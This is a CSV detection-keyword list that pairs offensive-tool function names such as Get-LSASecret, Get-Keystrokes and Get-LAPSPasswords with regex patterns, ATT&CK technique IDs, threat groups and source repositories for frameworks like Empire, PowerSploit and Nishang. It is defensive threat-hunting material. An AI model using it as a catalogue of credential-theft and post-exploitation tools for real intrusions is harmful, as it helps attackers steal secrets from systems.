"*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46084"
"*Get-Keystrokes.ps1*",".{0,1000}Get\-Keystrokes\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46085"
"*Get-Killdate*",".{0,1000}Get\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46086"
"*get-killdate*",".{0,1000}get\-killdate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46087"
"*Get-KIWI_KERBEROS_LOGON_SESSION*",".{0,1000}Get\-KIWI_KERBEROS_LOGON_SESSION.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","46088"
"*Get-LAPSPasswords*",".{0,1000}Get\-LAPSPasswords.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46089"
"*Get-LAPSPasswords.ps1*",".{0,1000}Get\-LAPSPasswords\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46091"
"*Get-LastLoggedon -*",".{0,1000}Get\-LastLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46092"
"*Get-LastLoggedOn ?ComputerName *",".{0,1000}Get\-LastLoggedOn\s?ComputerName\s.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46093"
"*Get-LastLoggedOn*",".{0,1000}Get\-LastLoggedOn.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46094"
"*Get-LocalGroupMember -Group Administrators*",".{0,1000}Get\-LocalGroupMember\s\-Group\sAdministrators.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46095"
"*Get-LoggedOnLocal -*",".{0,1000}Get\-LoggedOnLocal\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46096"
"*Get-LoggedonLocal -ComputerName *",".{0,1000}Get\-LoggedonLocal\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46098"
"*GetLoggedOnUsersRegistry.cs*",".{0,1000}GetLoggedOnUsersRegistry\.cs.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","46099"
"*getLogger(""NemesisConnector"")*",".{0,1000}getLogger\(\""NemesisConnector\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","46100"
"*Get-LolDrivers*",".{0,1000}Get\-LolDrivers\s.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46101"
"*Get-LsaRunAsPPLStatus*",".{0,1000}Get\-LsaRunAsPPLStatus.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46102"
"*Get-LsaSecret *",".{0,1000}Get\-LsaSecret\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46103"
"*Get-LsaSecret *",".{0,1000}Get\-LsaSecret\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","46104"
"*Get-LSASecret*",".{0,1000}Get\-LSASecret.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46105"
"*Get-LSASecret.ps1*",".{0,1000}Get\-LSASecret\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46106"
"*Get-LSASecret.ps1*",".{0,1000}Get\-LSASecret\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","46107"
"*Get-LSASecrets.ps1*",".{0,1000}Get\-LSASecrets\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46108"
"*getlsasrvaddr.exe *",".{0,1000}getlsasrvaddr\.exe\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","46109"
"*GetLSASRVaddresses v%s - (c) 2011 Hernan Ochoa*",".{0,1000}GetLSASRVaddresses\sv\%s\s\-\s\(c\)\s2011\sHernan\sOchoa.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","46110"
"*Get-MinimallyObfuscated -ScriptPath *",".{0,1000}Get\-MinimallyObfuscated\s\-ScriptPath\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","46111"
"*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46112"
"*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46113"
"*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46114"
